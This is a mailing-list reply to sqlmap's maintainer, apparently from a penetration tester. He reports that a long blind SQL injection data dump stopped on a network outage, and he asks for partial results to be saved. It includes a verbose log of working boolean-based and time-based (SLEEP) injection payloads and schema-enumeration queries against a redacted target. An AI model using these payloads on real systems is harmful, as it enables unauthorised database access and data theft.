Re: [sqlmap-users] dump data after timeout condition

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hi Miroslav,

Am 07/14/2014 08:56 PM, schrieb Miroslav Stampar:
> Hi Dirk.
>
> sqlmap doesn't retrieve already retrieved data. It stores them into the local session data for later (re)usage.

I thought so too. But when for some reason the network times out or any other special circumstances occur
it would be great if sqlmap would just dump immediately what it retrieved so far. I started it again afterwards,
hoping after ^C it would dump the whole data then but it  dumped 1-2 lines only.

>
> "boolean-based blind vulnerability and I tried to retrieve a few tables with big chunks of data" -> I would expect your problem in union SQLI, but not boolean-based blind.

nope, definitely it's a boolean based  blind and at the same time (same variable) a time-based blind vulnerability I am exploiting.
During this run I left sqlmap the choice which one to exploit. Previously I thought I restricted it to use
--technique=B .
>
> Please make sure that:
> 1) you are running the latest revision from our Github repository

check (ok, from last week)

> 2) that target is not having some kind of WAF protection mechanism that does the hard drop of requests

check (definitely network issue). But I didn't run wireshark or so, so I can't tell whether a TCP RST was sent
from a party in between.

>
> As said, I don't see a reason why would sqlmap fail here. It would be great if you could isolate "problematic" payload with usage of -v 3 and try it inside the browser (to see what's happening)

Miroslav, I can only report what I observed :-) Data retrieval on this special table was running for ~3 days.
I retrieved numerous other tables the week before (exactly the same vulnerability) and I am really certain the
original cause of the hiccup was just a network outage.

The last famous words before bail out were:

[09:54:15] [INFO] retrieving the length of query output
[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),1,1))>51 AND (7548=7548
[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),1,1))>48 AND (7548=7548
[09:54:15] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>1 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),1,1))>47 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),2,1))>51 AND (7548=7548
[09:54:16] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),2,1))>48 AND (7548=7548
[09:54:17] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(<row>) AS CHAR),0x20) FROM  <db>.<table> ORDER BY id LIMIT 21,1),2,1))>1 AND (7548=7548
[09:54:17] [INFO] retrieved: 0
[09:54:17] [DEBUG] performed 7 queries in 2.11 seconds
[09:54:17] [DEBUG] performed 0 queries in 2.12 seconds
[09:54:17] [PAYLOAD] 2885) AND 6853=IF((ORD(MID((SELECT IFNULL(CAST(<row> AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>64),SLEEP(5),6853) AND (5650=5650
[09:54:19] [PAYLOAD] 2885) AND 6853=IF((ORD(MID((SELECT IFNULL(CAST(<row> AS CHAR),0x20) FROM <db>.<table> ORDER BY id LIMIT 21,1),1,1))>32),SLEEP(5),6853) AND (5650=5650
[09:54:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:22] [INFO] fetching columns for table <table> in database <db>
[09:54:22] [PAYLOAD] 2885) AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=<hexstr1> AND table_schema=<hexstr2>),1,1))>51 AND (1291=1291
[09:54:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:23] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:24] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[09:54:25] [CRITICAL] unable to connect to the target URL or proxy
[09:54:25] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 36 times, 503 (Service Unavailable) - 2 times

[*] shutting down at 09:54:25

I won't be able to reproduce it, sorry. ;-/ My point is a feature request: if an error condition occurs, sqlmap
should better dump immediately the data it already retrieved, in csv format.

Cheers,

Dirk

PS: I didn't modify any timeout or retry values, so normally I would expect sqlmap at least 3x30 seconds before bail out, correct?